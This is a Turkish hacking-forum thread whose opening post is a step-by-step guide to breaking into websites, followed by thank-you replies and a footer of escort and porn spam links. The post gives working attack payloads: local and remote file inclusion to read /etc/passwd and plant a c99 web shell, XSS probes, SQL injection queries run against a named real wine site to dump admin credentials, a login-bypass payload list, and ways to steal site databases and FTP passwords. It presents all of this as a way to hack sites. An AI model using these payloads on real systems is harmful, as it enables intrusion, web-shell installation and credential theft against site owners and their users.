KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Vip Üyelerin Değil Herkezin Beleş Hakkı
Konu : Vip Üyelerin Değil Herkezin Beleş Hakkı - 28.11.2013, 15:27
Mesaj: #1
İlk başta açıkları tanıyın daha sonra siteleri hackleyin.

1- Local File İnclude Nedir?

LFI (Local File İnclude) Yerel dosya çağırmak anlamına gelir.Bu açık şuanda bu o kadar güncel değildir.Ama bazı sitelerde nadir olarak görülebiliyor.Ben bu açıktan bahsetmeyecektim ama Web Güvenlik Açıkları denildiği zaman tüm WEB UYGULAMALARINI Kapsıyor.Bu sebep yüzünden bahsedeceğim.

2- Local File İnclude Mantığı Nedir?

LFI Açığının mantığı server üzerinde dosyaları okumaktır.Örnek olarak etc/passwd dosyasından bahsedeyim.Serverdaki tüm sitelerin USER’larının bulunduğu dosyadır.Bu açık sayesinde Serverdaki dosyaları okuma şansımız oluyor.

3- Saldırı Anı (Açığın Tespiti)

Bir Web Sayfası düşünün; [font]www.site.com/sayfa.php?id=2[/font] şeklinde olsun..Burada LFI Olup olmadığını şöyle anlayabiliriz;
[font]www.site.com/sayfa.php?id= [/font]yaptığımızda sayfada eğer bir SQL İnjection hatası veya dosya bulunamadı şeklinde bir hata varsa orada LFI Olabilir.Peki Hata olarak nasıl bir hatadan bahsediyoruz?
Bize verilen hatadan yola çıkalım;

[font]Warning: include() “/home/user/public_html/sayfa.php”[/font]

Şeklinde bir hata alıyorsak LFI Vardır diyebiliriz.

4- Saldırı Anı 2 (Açığın Kullanımı - Aksi Halde Bypass)


Ne demiştik.Sitemizde Warning: include() [font]“/home/user/public_html/sayfa.php”[/font] şeklinde hata aldık.;
Açığı ../../etc/passwd şeklinde etc/password dosyasını okuyarak anlayabiliriz.Fakat burada ../../ dizin sayısı önemlidir.Hatada kaç adet dizin var bakalım;

[font]/home/[/font] -> 1
[font]/user/[/font] -> 2
[font]/public_html/[/font] -> 3
[font]/sayfa.php[/font] -> 4

Evet 4 Adet dizin mevcuttur.Koyacağımız ../ işareti 4 adet olmalıdır;

[font]www.site.com/sayfa.php?id=[font]../../../../etc/passwd[/font][/font] şeklinde...

[font]-HTML Code[/font]

HTML kod çeviriciler mevcuttur internet üzerinde.Encode edeceğimiz komut;

Komut: ../../../../etc/passwd
Encode: ..%2F..%2F..%2F..%2Fetc%2Fpasswd

Tekrar deneyelim;

[font]www.site.com/sayfa.php?id=..%2F..%2F..%2F..%2Fetc%2Fpasswd[/font] ve okumak istediğimiz /etc/passwd dosyasını okuduk;

İmage

[font]- CharCode[/font]

CharCode Mozillanın Hackbar Eklentisinde Mevcuttur.Şimdi tekrardan bir bakalım
[font]www.site.com/sayfa.php?id=../../../../etc/passwd [/font]şekline okumak istediğimizde tekrar okumuyor.HTML code encode şeklinde yaptık gene başarısız..Şimdi CharCode şeklinde yapacağız;

Komut: ../../../../etc/passwd
CharCode: String.fromCharCode(46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)

Evet dönüştürdük.Şimdi tekrar bakalım;

[font]www.site.com/sayfa.php?id=String.fromCharCode(46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)[/font]


Şeklinde okuduk..Dosyamız başarılı bir şekilde okundu İmage ;

İmage

[font]- %00[/font]

Bu nedir diyeceksiniz.Çok basit bir yöntem aslında.Şimdi linkimizi tekrar göz önüne alalım;

[font]www.site.com/sayfa.php?id=../../../../etc/passwd[/font] şeklinde okuyamadığımızı farz edelim; Satır sonuna %00 ekliyoruz bu işaret olaya netlik kazandırıyor;
[font]www.site.com/sayfa.php?id=../../../../etc/passwd%00[/font] evet bu şekilde okumayı başardık İmage

İmage

5- Saldırı Anı 3 (Açığı Kullanarak Siteye Dosya Yedirmek)

Açığın tespitinden bahsettik.Şimdi bu açığı kullanarak dosya dahil edeceğiz.Önce mozillanın tamper data eklentisini kurun.Daha Tamper Data yı açın.Start’a tıklayın ve [font]www.site.com/sayfa.php?id=../../../../etc/passwd%00[/font] şeklinde sayfayı yenileyin.Önünüze gelen ilk uyarıya “TAMPER” Şeklinde cevap verin.Karşınıza;

İmageThis image has been resized.Click to view original image
[table][tr][td]wol_error.gif[/td][td]This image has been resized.Click to view original image[/td][/tr][/table]İmage

Şeklinde bir panel gelecek.User-Agent Kısmındaki yazıları silin ve [font]<? system(“cat www.site.com/c99.txt? -O c99.php “); ?>[/font] şeklinde Dosya adresinizi yazın.Yanlız dikkat edin yüklerken dosyayı .txt uzantılı olmasına dikkat edin..Yazdıktan sonra tamam diyoruz.Ve dosyamız dahil edilmiş oluyor;
[font]www.site.com/c99.php[/font] şeklinde çagırabilirsiniz..

6- Local File İnclude Nerelerde Tespit Edilebilir?

[font]a-) Search kutusu[/font]

Bir Search kutusu düşünün;
İmage

Buraya LFI Komutunu girip ara butonuna tıklayalım; ../../etc/passwd%00 şeklinde..
Eğer ekrana ;

İmage

Şeklinde komutumuz çalışırsa bu demek oluyor ki Search dosyasında LFI Açığı mevcuttur.


 

[font]2.ci konumuz Xss açığı

a-) Search Kutularında[/font]
XSS açığı bir çok yerde bulunabilir..Eğer bir XSS Açığı arıyorsanız sizlere birkaç dork verip onun üzerinde denemeler yapabilirsiniz.Dork;

inurl:”search.php?id=”
inurl:”index.php?id=”
inurl:”kayit.php?id=”

bu dorklar çuğaltılabilir...
Search (Arama) Kutularında, id= değeri, ziyaretçi defterleri, Kayıt Formları, Yorum Formları vb yerlerdede bulunabilir.Bir Search kutusu düşünün;

İmage

Search kutusuna XSS açığının olup olmadığını anlamak için bir alert kodu yazalım;; [font]< script>alert(“Buralar eskiden hep XSS di.”);</script>[/font] ..
Yazdıktan sonra arama butonuna tıklıyoruz.Eğer açık mevcut ise ekrana bir alert yansıyacaktır, şu şekilde;

İmage

[font]b-) id= Değerinin Bulunduğu Yerlerde[/font]

Bir Web sayfası düşünün ; [font]www.hedefsite.com/deger.php?id=3[/font] şeklinde olsun..Id= değerinin sağ tarafında bulunan rakam, harf, kelime veya her ne ise silip, onun yerine açık olduğunu anlamamız için alert kodunu yazıyoruz;

[font]www.hedefsite.com/deger.php?id=[/font][font]< script>alert(“Buralar Eskiden Hep XSS di ”);</script>[/font]
Daha sonra bu gönderdiğimiz sorgu ile ekrana alttaki şekilde bir alert yansıyorsa açık olduğunu tekrar anlıyoruz.;

İmage

[font]c-) Ziyaretçi Defterlerinde (STORED XSS)[/font]

İmage

Üstte görülen resim bir sitede bulunan ziyaretçi defteridir.Ziyaretçi Defterleri web sayfaları için çok tehlike arz eden yerlerdir.Bu zaafiyet türüne STORED XSS Zaafiyeti denilir.Buraya yazdığımız bir HTML veya Javascript kodu herkez tarafından görülebildiği için sayfada çalıştığında ziyaretçi defterine giren herkez tarafından sizin girdiğiniz kod çalışacaktır.Yani gireceğiniz HTML **** yönlendirme kodu sayfaya giren şahısları hedef adreslere yönlendirecektir.Bu saldırıya biraz daha süs katmak için Phising sayfanıza veya Fake sayfanıza yönlendirme yapabilirsiniz.Şimdi burada görülen kutucuklara XSS Alert kodunu yazıyoruz.;

İmage

Eğer açık varsa sayfa bizim kodumuzu çalıştıracaktır.Yani ekrana alert gelecektir.;

İmage

[font]d-) Kayıt Formlarında[/font]
[table][tr][td] [/td][td] [/td][/tr][/table]İmage


Kayıt Formları XSS Açığı için olanak sağlıyor.Kayıt Formları genellikle Forum sitelerde mevcuttur.Forum siteleri çoğunluk olarak hazır sistem kullanırlar.(MyBB, Vb, SMF vs vs)
Eğer bir forumda hazır sistem kuruluysa veya sürüm olarak belirli bir sürümü varsa ki genelde olur; Exploit sitelerinden O sistemin sürümünü araştırabilir, XSS Açıkları mevcutsa Exploit yardımıyla açığı sömürebilirsiniz.Biz sistem kullanılmayan bir forum sitesinden devam edelim İmage Üstte görüldüğü gibi bir kayıt formu mevcut.Buradaki kutucuklara tıpkı ziyaretçi formlarındaki gibi XSS Alert kodlarımızı entegre ediyoruz.Eğer açık mevcutsa alert alınır.

[font]e-) Yorum Formlarında[/font]

Bu şıkkımızı Cyber-Warrior’dan alıntı yaparak anlatayım..
[table][tr][td] [/td][td] [/td][/tr][/table]İmage

Görüldüğü gibi bir konun altında mevcut olan yorum yazma texti..
Burada Mesaj *: text bölümüne XSS Alert kodumuzu yazıyoruz;
[table][tr][td] [/td][td] [/td][/tr][/table]İmage

[font]RFI[/font]
1- Remote File İnclude Nedir?

RFI(Remote File İnclude) Uzakdan dahil etmek anlamına gelir.Eskisi kadar olmasa da şuanda mevcut olan siteler var..


2- Remote File İnclude Mantığı Nedir?

Mantığı açık bulduğumuz siteye istediğimiz sitedeki bir dosyayı dahil etmektir.

3- Saldırı Anı (Açığın Tespiti - Açığın Kullanımı - Aksi Halde Bypass)

Bir web sitesi düşünün ; [font]www.site.com/dosya.php?id=2 [/font]olsun.İd= değerinden sonraki 2 yi siliyoruz;
[font][font]www.site.com/dosya.php?id=[/font] [/font]oluyor.Şimdi burada açık olup olmaığını nasıl anlarız?
Bir host’a dosyanızı txt uzantılı olarak atın.Daha sonra sitede ; [font]www.site.com/dosya.php?id=http://www.sitem.com/c99.txt?[/font] şeklinde çağırın.Eğer sayfada çağırdığınız dosya çalıştıysa açığı hem bulmuş hemde hazır hale getirmiş oluyorsunuz zaten..

4- Remote File İnclude Nerelerde Tespit Edilebilir?

[font]a-Search kutusu[/font]
Bir Search (Arama) düşünün ;

İmage

Şeklinde..Buraya [font]http://site.com/c99.txt?[/font] şeklinde dosyanızın adresini txt uzantılı yazıp ara butonuna tıkladığınızda, eğer karşınıza dosya geliyorsa , yani çağırdığınız dosya, burada RFI Açığı mevcuttur.Bu kadar basittir.


Sql Açığı

Kaç Tür SQL İnjection Vardır?

[font]a-) MySql İnjection[/font]
Evet kaç tür SQL İnjection saldırısı vardır konu başlığı altında, SQL İnjection türlerini tanıyacağız.
SQL İnjection türlerini bize verdikleri hatalar sayesinde ögreniriz.Yani Normal bir SQL İnjection hatası ile Mysql injection veya access Sql injection arasında dağlar kadar fark mevcut..
Daha öncesinde SQL İnjection açığının tespitini öğrenmiştik.Şimdi Mysql injection açığının hatasına bir göz atalım...

İmage

Gördüğünüz gibi normal bir SQL hatasından çok farklı.
Bu açığın kullanımına geçelim;

Aslında normal bir SQL İnj. açığından farklı bir kullanımı yok MySql’in..Ama anlatalım gene de..Mysql versiyonuna göre bazen değişiklik gösterebiliyor.Mysql version 5 olsaydı kolay kolay Veri çekemezdik.Ama artık 4 pek fazla kullanılmadığı için 5 üzerinden devam..

Hedef sitemiz; [font]http://www.paroswines.gr/english/product.php?id=22 [/font]

Kolon sayısını arayalım; [font]http://www.paroswines.gr/english/product.php?id=22+order+by+1-- [/font]yaptık sayfa düzeldi.order by 10 yaptık sayfada tekrar MySql İnjection hatası belirdi.Yani 10 dan küçük olduğunu anlıyoruz Kolonumuzun..

Teker teker iniyoruz; order+by+9-- yaptık.Sayfada hata duruyor.8 Yaptık sayfa düzeldi.Demek ki kolon sayısı 8 miş..
Şimdi kolonları yansıtalım;

[font]http://www.paroswines.gr/english/product.php?id=-22+union+select+1,2,3,4,5,6,7,8--[/font] bakıyoruz;

Ekrana 3 sayısı yansıdı..3 Üzerinden devam ediyoruz.
Yukarıda SQL Komutlarını görmüştük.Bu yüzden burada anlatmama gerek yok..

[font]http://www.paroswines.gr/english/product.php?id=-22+union+select+1,2,group_concat(table_name),4,5,6 ,7,8+from+information_schema.tables+where+table_sc hema=database()-- [/font]

Sorgusunun ardından ekrana table’lar yansıdı;
Tables; admin,kullanicilar,hizmetler,görseller … admin tablosu işimizi görür İmage
Şimdi admin tablosundaki kolonlara bakalım.

[font]http://www.paroswines.gr/english/product.php?id=-22+union+select+1,2,group_concat(column_name),4,5, 6,7,8+from+information_schema.columns+where+table_ schema=database()+and+table_name=admin-- [/font]

Ekrana user,pass,mail yansıdığını farz edelim.

[font]http://www.paroswines.gr/english/product.php?id=-22+union+select+1,2,group_concat(user,pass,email), 4,5,6,7,8+from+admin--[/font]


User: admin
Pass: 123456
Email: [email protected]

[font]b-) Ms Access SQL İnjection[/font]

Access SQL İnjection tahmine dayalı bir açıktır.Yani netlik ifade etmez..Tablo ismini biz kendi beyin gücümüzle tahmin gücümüzle bulmaya çalışırız.Bana göre en zahmetli injection türü..
SQL İnjection açıklarını hatalarına göre sıralıyorduk..Access SQL İnjection açığının da kendine özgü bir hatası vardır.Bu açığı bu hata ile anlarız.Access SQL İnjection ASP.NET ile kodlanmış sitelerde görülür genellikle.Çok yaygın bir SQL İnjection türüdür..
Hedef bir sitemiz olsun; [font]www.site.com/sayfa.asp?id=1[/font] şeklinde..Şimdi id=1 değernin yanına ‘ koyalım açık tespiti için.; [font]www.site.com/sayfa.asp?id=1’[/font]

Eğer böyle bir hata alıyorsak Ms Access SQL İnjection açığını bulduk demektir ;

[font]Microsoft JET Database Engine error ’80040e14’
Syntax error in string in query expression ’id = 10";’.
/sayfa.asp, line 7 [/font]

Şimdi Kolon sayısını ögrenelim, tekrar ORDER BY komutunu kullancaz.
[font]www.site.com/sayfa.asp?id=1+order+by+1[/font] yaptık.Sayfa eski haline geldi.Ekrandaki hata gitti.
[font]www.site.com/sayfa.asp?id=1+order+by+10[/font] yaptık.Sayfa değişti yani farklı bir hata var ; alınan hata ;



[font]Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
sayfa.asp, line 7[/font]

Bu hatada kolon sayısının 10 dan az bir sayı olduğunu söyliyor bize..Şimdi teker teker inerek devam ediyoruz taaki sayfa düzelene dek..

[font]www.site.com/sayfa.asp?id=1+order+by+9[/font] yaptık aynı hata mevcut.order+by+8 yaptık gene aynı hata mevcut,7 de tekrar hata aldık, 6 yaptık ekrandan hata gitti...Anlıyoruz ki kolon sayısı 6’ymış..

Sıra geldi tahmin kısmına.İşimize yarayacak tabloyu tahmin etmemiz gerekiyor.Önce admin tablosundan başlayalım;
[font]www.site.com/sayfa.asp?id=1+union+select+1,2,3,4,5,6+from+admin--[/font] yaptık.karşımıza ;

Hata gelmedi Yani admin diye bir tablo mevcutmuş.Ekrana kolonlar yansıdı, yansıyan kolonlar ; 2-4 olduğunu farz ediyoruz ve 2 ve 4 sayılarına sutün değerini yazıyoruz.Yani;

[font]www.site.com/sayfa.asp?id=1+union+select+1,username,3,password, 5,6+from+admin--[/font]
Şeklinde..Eğer ekrana username ve password yansımadıysa sutün isimleri username password değildir.

[font]www.site.com/sayfa.asp?id=1+union+select+1,user,3,pass,5,6+from +admin--[/font]
Şeklinde Yazdığımızda Ekrana user ve pass yansıdığını göreceğiz.Tabi burada kolonları ve tabloları tahmin olarak yazdık.Tüm sitelerde user pass olacak diye bir kaide yoktur..

User: mahserat
Pass: bugres

[font]c-) Blind SQL İnjection[/font]

Blind SQL İnjection diğer açık türlerinden farklıdır.Yani SQL İnjection açığında id=2 değerinin yanına koyduğumuz ‘ ve ‘a sayesinde açık olup olmadığını anlıyorduk.Fakat Blind SQL İnjection’da bu durum değişiyor..Açığı ‘ veya ‘a kullanarak almıyoruz. Şöyle bir durum daha var normal SQL İnjection türlerinde hata alırken, Blind Sql injection da hata almıyoruz.
Gene bir hedef site düşünün;
[font]www.sayfa.com/dosya.php?id=2.[/font] olsun.

Burada Blind SQL İnj. olup olmadığını şu şekilde anlıyoruz. ;

[font]www.sayfa.com/dosya.php?id=2 and 1=1--[/font] yapıyoruz ilk başta..Sayfada değişiklik olmuyor...
and 1=2-- yaptığımızda sayfa değişiyor.Hata olmuyor ama sayfa değişiyor.Diğer Türlerden ayıran bir özellik de budur.Evet sayfa değiştiği için burada Blind SQL İnjection vardır diyebiliriz.

Hemen MySQL Versiyonunu öğrenelim.Önce and substring(@@version,1,1)=4 komutuyla versiyonun 4 mü olduğa bakıyoruz.

[font]www.sayfa.com/dosya.php?id=2 and substring(@@version,1,1)=4[/font] şeklinde sorgu gönderdik.Sayfada bozulma oldu.Yani 4 değil.Bu sefer and substring(@@version,1,1)=5 komutu ile versiyonun 5 olup olmadığına bakalım.

[font]www.sayfa.com/dosya.php?id=2 and substring(@@version,1,1)=5[/font] sorgu gönderdiğimizde sayfada sorun yoksa eğer demek ki MySQL Versiyonu 5 miş..

Eğer versiyonu 4 olsaydı tahmin yoluyla yapmak zorunda kalırdık.Şimdi tabloları çekelim;

[font]www.sayfa.com/dosya.php?id=2 and substring((select table_name from information_schema.tables where table_name like [font]0x257573657225[/font]),1,1)=0x75[/font] komutunu yazacağız.Burada dedik ki içerisinde users geçen ilk tablonun ilk harfi 0x75 yani u’mu eğer u ise demek ki sayfa düzgün açılacak..Tablonun Users olduğunu farz ederek devam ediyorum..

[font]www.sayfa.com/dosya.php?id=2 and substring((select column_name from information_schema.columns where table_name=[font]0x7573657273[/font] limit 2,1),1,50) like [font]0x257061737325[/font][/font]

burada [font]0x7573657273[/font] bu users demek like 0x257061737325 buda pass demek yani yine deniyoruz.Burada limit 2 dedim.Nedeni ise genelde user ve pass sitede 0,1 ve 2. kolonlarda olur.Bu arada gördüğünüz 0x ile başlayan sayılar sizinde bileceğiniz üzere Hex’dir.

Şimdi user sutünunu çekelim..

[font]www.sayfa.com/dosya.php?id=2 and substring((select column_name from information_schema.columns where table_name=[font]0x7573657273[/font] limit 1,1),1,50) like [font]0x75736572[/font][/font]

Diyelim ki İki kolonud a doğru tahmin ettik.Şimdi ne var elimizde user ve pass kolonları var.İçerisindeki veriyi çekelim;
and substring((select user from users),1,1)=0x(tahmin edilen users..)
and substring((select pass from users),2,1)=0x(tahmin edilen users..)

Bu şekilde Hex ile harf harf tahmin ederek teker teker çekiyoruz..
Biraz zordur Blind SQL İnjection.Ama pes etmemek gerekir.

[font]d-) String SQL İnjection[/font]

Normal bir SQL İnjection saldırısında ne yapıyorduk? Önce ‘ veya ‘a koyarak SQL Hatası alıyorduk.Daha sonra ORDER BY komutu ile kolon sayısını öğrenip devam ediyorduk.String SQL İnjection’da işler değişiyor.Yani normal saldırıdaki gibi ‘ , ‘a koyuyoruz ama ORDER BY ile kolon sayısını öğrenmek istediğimizde öğrenemiyoruz.Yani;

[font]www.site.com/sayfa.php?id=1+order+by+1--[/font] yapiyoruz.Sayfa eski haline dönüyor.
[font]www.site.com/sayfa.php?id=1+order+by+99999999999999999-- [/font] yapıyoruz sayfada bir hata olmuyor sayfa değişmiyor.Bu String SQL İnjection’dur..Hemen kullanımına geçiyoruz.;

[font]www.site.com/sayfa.php?id=1’[/font] yaptık SQL Hatası aldık..Hemen kolon öğrenelim;
[font]www.site.com/sayfa.php?id=1+order+by+10-- [/font]Yaptık.Sayfa eski haline geldi.Hata yok;
[font]www.site.com/sayfa.php?id=1+order+by+100-- [/font]Yaptık.Sayfada gene bir hata söz konusu değil.
[font]www.site.com/sayfa.php?id=1+order+by+1000-- [/font]gene bir hata yok.Burada String devreye giriyor.

Hemen bakalım; [font]www.site.com/sayfa.php?id=1’ and ‘x’=’x[/font] yaptık.Sayfa değişmedi hata vermedi.Burada sitemizin x=x mi olduğunu sorguladık.Bir değişiklik olmadı yani bize olumlu yönde cevap verdi..

[font]www.site.com/sayfa.php?id=1’ and ‘x’=’y[/font] dedik.Bize olumsuz bir yanıt verdi.Girdiğimiz ‘ and ‘x’=’y komutu ile siteye x=y mi diye sorduk.Olumsuz bir yanıt almıştık.Site bize X Nasıl Y ‘ye eşit olabilir diye fırça attı İmage

Biraz olsa Blind SQL İnjection’a benziyor bu tür..


Hemen kolon sayısını çekelim; [font]www.site.com/sayfa.php?id=-1’ union select+0,1,2,3.. and ‘x’=’x [/font]diye sorgu gönderiyoruz.Fakat burada 0,1,2,3. dikkat.Önce 0 dan başlıyoruz.teker teker ilerliyoruz.Sayfaya kolon sayıları yansıyana kadar devam ediyoruz.Ekrana 2 nin yansıdığını farz ederek devam edelim.;

[font]www.site.com/sayfa.php?id=9999999.9’ and union select+0,1,(select group_concat(table_name)+from+informations_schema. tables+where+table_schema=database()),3 and ‘x’=’x[/font]

Yansıyan kolon sayısı 2 idi.Bizde 2 üzerinden işleme devam ettik.Normal şartlarda from+information.... sorgusu satırın sonunda iken burada tüm görevi 2. kolona devrettik.Fakat unutmayalım Parantezler içerisinde.

Evet tablolar yansıdı.Örnek olarak admin tablosunun yansıdığını farz edelim ve devam edelim.

[font]www.site.com/sayfa.php?id=9999999.9’ and union select+0,1,(select group_concat(column_name)+from+informations_schema .columns+where+table_schema=database()+and+table_n ame=’admin’),3 and ‘x’=’x[/font]

Evet admin tablosundaki sutünları yani kolonları yansıttık.Kolonlar; email,id,username,password olduğunu farz ediyoruz..

[font]www.site.com/sayfa.php?id=9999999.9’ and union select+0,1,(select group_concat(username,password)+from+’admin’),3 and ‘x’=’x[/font]


Şeklinde K.adı ve Şifreyi çektik..

[font]e-) SQL İnjection Login Bypass[/font]

SQL İnjection Login Bypass çok basit bir injection türüdür.Web Sitelerindeki Login Kısımlarında meydana gelen bu açık birçok web sitesinde mevcuttur.Bir admin panelini hedef alarak saldırıya başlayalım;

İmage

Bu tarz bir login kısmı olduğunu farz edelim.Burada Kullanıcı adını ve Şifresini bypass edeceğiz..Peki nasıl
SQL İnjection da login panelleri için bypass kodları mevcuttur.Bunlardan birkaç’ını vereyim sizlere;



admin’--
’ or 0=0 --
’ or ’ 1=1
’ or ’ 1
’ or ’
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi")or("a"="a



Bu kodlar sayesinde Login kısmını bypass edebiliriz.Bu açık çoğu web sayfasında mevcuttur.Genellikle panel yolu /admin/admin.php olan web sitelerinde gözüme batmadı değil..Evet bir bakalım kendimize bir bypass kodu seçiyoruz.

‘OR’ ‘=’ kodunu seçtim..Şimdi gerekli text kısımlarına yazalım..

İmage

Evet resimde görüldüğü gibi Kullanıcı adı ve şifre kısmına kodumuzu yazdık.Giriş Yap diyoruz;

İmage

Görüldüğü üzere giriş başarılı oldu İmage Evet Login bypass bu kadar basit bir mevzu..


[font]f-) PostData SQL İnjection[/font]

Bu injection türü ASP.NET sitelerde textboxlarda mevcut olan bir açıktır.Diğer HTML sitelerde ise <input type=”text” ‘larda mevcut bir açık türüdür..Çok basittir.Normal bir SQL İnjection açığıda sitede açık analizi yapma şeklimiz şuydu; [font]www.site.com/sayfa.php?id=1’[/font] idi..Burada adı üstünde POSTDATA yani POST Methotlarının kullanıldığı yerlerde bu injection saldırısını yapacağız.Peki nasıl?

Şimdi iki adet text kısmı düşünün Kullanıcı adı ve Şifreden oluşan...

Şimdi gördüğümüz Textlere Normal İnjectiondaki saldırılar gibi ‘ veya ‘a karakterlerini ekliyoruz.

İmage

Evet ekledikten sonra GÖNDER botunona basıyoruz.Karşımıza
[table][tr][td] [/td][td] [/td][/tr][/table]İmage

Şöyle bir SQL İnjection hatası çıkarsa, bu login dosyasında SQL İnjection açığı mevcuttur diyebiliriz.Şimdi tekrar login kısmına geri dönüyoruz ve kaynak kodunu göster diyoruz.

[font]<form name="t1" method="POST" action="login.aspx">[/font]

Kaynak kodundaki önemli olan yer üstteki Method dur.Yani gönderilen veri POST Methoduyla gönderilmelidir..POST ‘un diğer Methodlardan farkı ise POST’un hızlı ve güvenilir olmasıdır.

Peki bu açığı nasıl kullanacağız?
Kaynak kodunu alıyoruz bir notepad’a yapıştırıyoruz.Daha sonra [font]<form name="t1" method="POST" action="login.aspx">[/font] Kodundaki POST Methodunu GET Methoduna çeviriyoruz.Daha sonra login.aspx dosyasının tam yolunu belirtiyoruz.Yani ;

[font]<form name=”t1” method=”GET” action”http://site.com/login.aspx”>[/font]


Kaynak kodlarında bu kısmı bu şekilde düzetip html uzantılı kaydediyoruz.Daha sonra tekrar bir tarayıcıda açıyoruz ve textlere ‘a koyuruz.Linkte ; [font]www.site.com/login.aspx?kadi=’a&sifre=’a&Submit=G%F6nder[/font] şeklinde gözükecektir. [font]www.site.com/login.aspx?kadi=a’a [/font]şekline SQL İnjection toolarıyla açığı kullanabilirsiniz.
SQL İnjection saldırısını ve türlerini iliklerine kadar biliyorsunuz artık İmage

[font]Asp Açığı

Asp site hack yöntemleri

--------------------------------------------------------------------------------

Bu hack yontemi asp-nuke ile yapılmış sitelerde geçerlidir.Olayın mantıgı su db(database) calma yontemi.Sitenin sonuna db/main.mdb getirerek db yi almak.

Bir örnek vereyim

http://www.hackleneceksiteadi.com/db/main.mdb

db yi indirdiniz Microsoft Access le actınız karsınızda site üyeleri gorunmektedir.Bizim amacımız admin bilgilerini bulmak.

Admini nasıl buluruz.

Örnek database actıgımızda şunun gibi ekran gelir.


ulogin upassword uRole Name
badboy deneme user memeo
memocan sanane Admin onur

Admini bulduk şimdi.2. sıradaki admin bilgileri.Login name:memocan password:sanane.şimdi siteye giriyoruz.login bolumunden login olup siteyi hackliyoruz.

2.Döküman

\'or\'\'=\' ile web hack

Bu acık tipi asp ile yapılmıs sistemlerde bulunmaktadır.Bu acıgı kullanmak admin panelini bulmamız lazım.

Admin panelini bulduk diyelim.Kullanıcı adına \'or\'\'=\' password:\'or\'\'=\' yazıyoruz ve giriyoz.Ama bazı sitelerde işlemeyebilir,çünkü acıgı kapatmış olabilirler.

Mesala bi kac taktik vereyim size admin panelini bulmak için.

http://www.google.com/ " target="_blank">http://[URL="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&h=BAQGVnXKs &s=1"]http://www.google.com/[/URL] girin admin.asp,siteadmin.asp,login.asp,siteeditor.asp vs.. yazın ve size sitenin admin panelini bulacaktır ondan sonra hackleyin..

Şunu da söyliyim intelli tamper adlı bir program var.Bu program sitenin sayfalarını listeliyor o programla admin panelini bulabilirsiniz bir ihtimal.Programı google.com dan intellitamper download diye aratın ve ilk siteden indirin.


3.Döküman

Bu yöntem tamamen kendi düsüncemle bulunmustur.Olayın mantıgı adminşifresini bulmak

Google " target="_blank">http://[URL="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&h=8AQEDjEcM &s=1"]http://www.google.com/[/URL] a gelin adminpass.txt,adminpassword.txt,adminpaswd.txt,def aultpass.txt vs..diye aratın.olay tamamen sizin hayal gücünüze bağlıdır.

Arattınız ve buldunuz yine admin panelini bulmanız gerek.admin panelini bulursanız hacklersiniz.


4.Döküman

Evet bu yöntemi cok seviyorum ama şahsen bu yontemle webhacklemek de istemiyorum amacım exploitle web hacklemek:]

Kazaa ile web hack

Kazaa programını acıyoruz ve Search basıyoruz.P2P Search bölümünü işaretliyoruz.Onun altında Everything i isaretliyoruz.arama bölümüne smdata.dat sm.data.dat diye aratıyoruz.bunlar cutftp şifre saklanan bolumu başka ftp ler başka dosya içinde saklıyo şifrelerini.Siz onları bulursanız onlarla da aratabilirsiniz.

Neyse arattık aradıklarımız bulduk.O dosyaları bilgisayarımıza download ediyoruz.Ondan sonra cutftp programını acıyoruz F4 basıyoruz sora importa basıyoruz Gözat gibi secekenek ordan smdata.dat veya sm.data.dat dosyasını seciyoruz ok diyoruz.Karsınızda sitenin ftp usarnamesi ve passwordu karsınıza cıkıyor ondan sonra siteyi hackliyorsunuz


mdb çalmak için denememiz gerekmez intellitamper gibi bir site haritası çıkaran program kullanabilir , google'dan site:www.xxx.com diye arama yapabilir onlardan da bulamadıysak robots.txt'ye bakabiliriz. [/font]

http://www.youtube.com/watch?v=v2M1ijYUZl0
 

(Son Düzenleme: 28.11.2013, 15:34, Düzenleyen: Radmin.)
Alıntı ile Cevapla
Konu : Vip Üyelerin Değil Herkezin Beleş Hakkı - 28.11.2013, 15:57
Mesaj: #2
açıklayıcı yararlı olur bilmeyenler için )
Düşsede Kalkan Rocky Gibiyim :F1
- Byt3 is back..


WWW Alıntı ile Cevapla
Konu : Vip Üyelerin Değil Herkezin Beleş Hakkı - 30.01.2014, 15:54
Mesaj: #3
Okudum fakat bu işleri bilmedigim için 2 3 kez daha okumam lazım : ) Bütün genel bilgiler verilmiş elinize sağlık
iLLaqaL KonyaLı . .İmage

WWW Alıntı ile Cevapla
Konu : Vip Üyelerin Değil Herkezin Beleş Hakkı - 10.03.2014, 20:46
Mesaj: #4
Cok teşekkur ederm cok yararlı bir döküman )

Alıntı ile Cevapla
Konu : Vip Üyelerin Değil Herkezin Beleş Hakkı - 13.03.2014, 22:12
Mesaj: #5
emegine saglik

Alıntı ile Cevapla
Konu : Vip Üyelerin Değil Herkezin Beleş Hakkı - 27.03.2014, 22:14
Mesaj: #6
İmage
İmage

"İdealler yıldızlar gibidir. Onlara belki ulaşamazsınız ama bakarak yönünüzü tayin edebilirsiniz."






Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno